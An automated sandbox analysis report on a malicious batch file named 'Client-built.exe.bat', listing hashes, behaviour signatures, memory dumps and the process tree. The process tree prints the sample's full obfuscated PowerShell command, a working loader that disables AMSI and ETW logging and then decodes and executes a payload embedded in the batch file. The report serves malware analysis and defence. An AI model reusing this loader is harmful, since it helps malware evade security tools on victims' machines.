Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system
  • submitted
    25-11-2024 23:53

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    e8f9b123f6368338546d660e983af6b0

  • SHA1

    d622ddcfbba5060244816540768925563a7c66c3

  • SHA256

    4a664bab85afe1b3d5013278ba99280506c1eb42bac4e7b23bcc932eda627c8b

  • SHA512

    6ad576a2dd1e73b2eb18c240bd4ac824850e431d800fc2d8c520f6a2b1ea8d50d01c008bcab5cb1cc5189f120fd331870fa25925a2994a8c1e84e265492e9f5c

  • SSDEEP

    49152:eDzoesdQ9TpsKmiB/J73/gnGKmTi5wU50WU:Q

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';if (.([char](((-18989 -Band 4925) + (-18989 -Bor 4925) + 5167 + 8981))+[char]((15592 - 5449 - 5372 - 4670))+[char]((7757 - 4149 - 3692 + 199))+[char]((6189 - 5510 - 4827 + 4264))+[char](((-712 -Band 8324) + (-712 -Bor 8324) - 9313 + 1746))+[char](((-4636 -Band 8829) + (-4636 -Bor 8829) - 9840 + 5727))+[char]((21086 - 6295 - 9972 - 4722))+[char]((13029 - 9372 + 5383 - 8924))+[char](((2214 -Band 3002) + (2214 -Bor 3002) + 14 - 5126))) ([SySTEM.Text.eNcODiNg]::UTf8.geTStRiNg([syStem.cOnVERt]::FROmBaSe64STRINg('JEVOVjp1c2VycHJvZmlsZVxE')) + [SySteM.teXt.encOding]::UTF8.geTStriNg((0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x5c, 0x52, 0x65, 0x73, 0x75, 0x6d, 0x65)) + [syStem.tEXT.encODing]::uTF8.gEtstRing((0x47, 0x72, 0x61, 0x6e, 0x74, 0x2e, 0x73, 0x79, 0x73)))) { exit };${kdOtLCJrxpwvng}=([systEM.tExt.eNcoDinG]::utf8.GeTSTrINg((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SySTEm.TeXt.ENCOding]::UTF8.geTsTRIng([SysTem.conVeRt]::fROmbaSe64StRINg('QXV0b21hdGlvbi5BbXNpVXRpbHM=')));${k`DotvllZJgLtgx}=([SystEM.tEXt.ENcODInG]::uTF8.GETstrInG([sYStEm.COnVeRT]::FrOmbaSe64strIng('YW1zaUluaXRGYWlsZWQ=')));${KdOteJyma`PyhoD}=[REF].AssEmblY;${kdOtap`Yr`KnuXkZ}=${kdOt`EJYMapYHOD}.geTtype(${k`Dotl`CjrxpwvnG});$kdoTgnaGLeanqB=${kdoTaPyrkn`UXKz}.geTfIELD(${KdotvL`Lz`JgLtgx},([SysTeM.tExt.EnCODING]::uTF8.geTStrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));$KdOtgNaGLeanQb.sEtvaLUE($nULl,([BOol][chaR]));([REflEcTion.ASsemBlY]::LOaDwIthpARtIALnaME(((([sySTEM.text.eNcOdiNg]::utF8.GETStRing((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).GeTTYPe(((([SyStEm.TeXT.ENcOdING]::utF8.geTSTRInG((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105)) + [syStem.TExT.EncoDing]::utF8.gEtSTRing((99, 115, 46, 69, 118, 101, 110, 116, 105, 110, 103, 46, 69, 
118, 101, 110, 116, 80, 114, 111)) + [SysTEm.tEXT.ENCOdinG]::UTF8.GETstring((0x76, 0x69, 0x64, 0x65, 0x72)))))).GETfIeLD(((([sYsTeM.TeXt.ENcOdiNg]::Utf8.GeTstRiNG((109, 95)) + [sySteM.texT.enCODInG]::UTF8.GEtSTring((0x65, 0x6e, 0x61, 0x62)) + [sYsTem.TeXt.eNCOdIng]::UTf8.geTSTRING((108, 101, 100))))),((([system.TeXt.EncOdInG]::utF8.gEtSTRinG((78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 73, 110, 115, 116, 97, 110, 99, 101)))))).SetVaLuE([Ref].ASsEmbly.getType(((([systEm.Text.ENcODIng]::uTF8.GeTStriNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99, 105)) + [SYSteM.TEXT.ENCodIng]::Utf8.GEtSTrinG((0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).GetfielD(((([SySTEM.teXT.eNcODiNG]::utf8.gETStRing((0x65, 0x74, 0x77, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72))))),((([SysTeM.TEXt.ENCoDInG]::utf8.gEtsTRinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))))).GetVAluE($nULl),0));.([char]((-257 - 1031 + 9766 - 8373))+[char]((1823 - 9768 + 8223 - 177))+[char](((-19562 -Band 889) + (-19562 -Bor 889) + 9885 + 8908))) ([tEXT.encodIng]::UTF8.gEtSTrING([CoNvErt]::FroMBAse64StriNg((.([char]((11498 - 2401 - 178 - 8848))+[char]((-11105 - 5194 + 7505 + 8895))+[char]((222 - 4618 + 153 + 4359))+[char]((-2637 - 1093 + 9286 - 5511))+[char](((-4650 -Band 9781) + (-4650 -Bor 9781) - 1475 - 3589))+[char]((3131 - 3111 + 154 - 63))+[char]((18786 - 6317 - 8092 - 4267))+[char](((-2844 -Band 5727) + (-2844 -Bor 5727) - 703 - 2064))+[char]((7821 - 9012 - 6084 + 7376))+[char]((4558 - 872 + 4205 - 7781))+[char](((15508 -Band 482) + (15508 -Bor 482) - 7709 - 8165))) $KDot_file -raw | .([char]((11950 - 980 - 4943 - 5944))+[char](((-8135 -Band 6460) + (-8135 -Bor 6460) - 479 + 2255))+[char](((-13228 -Band 3952) + (-13228 -Bor 3952) + 547 + 8837))+[char](((-19627 -Band 1554) + 
(-19627 -Bor 1554) + 9787 + 8387))+[char](((-21855 -Band 6576) + (-21855 -Bor 6576) + 9605 + 5773))+[char](((10719 -Band 1622) + (10719 -Bor 1622) - 4422 - 7803))+[char](((15556 -Band 721) + (15556 -Bor 721) - 9597 - 6635))+[char](((4849 -Band 877) + (4849 -Bor 877) - 2305 - 3338))+[char](((-13113 -Band 8015) + (-13113 -Bor 8015) + 3741 + 1473))+[char]((-17 - 8310 + 8801 - 360))+[char](((-8482 -Band 1532) + (-8482 -Bor 1532) + 8379 - 1324))+[char]((-1608 - 2948 - 4299 + 8965))+[char](((-7699 -Band 8648) + (-7699 -Bor 8648) + 538 - 1384))) (([SySTem.teXt.eNcOdiNg]::UTf8.GEtsTrinG(58)) + ([SyStem.TExT.ENcodinG]::utf8.gETstRINg([sYstem.cOnVert]::FRoMbaSe64strIng('OktET1Q6OiguKik='))))).MAtcHeS.GrouPS[1].vaLuE)))"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2352

Network

MITRE ATT&CK Enterprise v15

Replay Monitor


Downloads

  • memory/2352-4-0x000007FEF651E000-0x000007FEF651F000-memory.dmp

    Filesize

    4KB

  • memory/2352-5-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-6-0x000000001B120000-0x000000001B402000-memory.dmp

    Filesize

    2.9MB

  • memory/2352-8-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-7-0x0000000002490000-0x0000000002498000-memory.dmp

    Filesize

    32KB

  • memory/2352-9-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2352-10-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB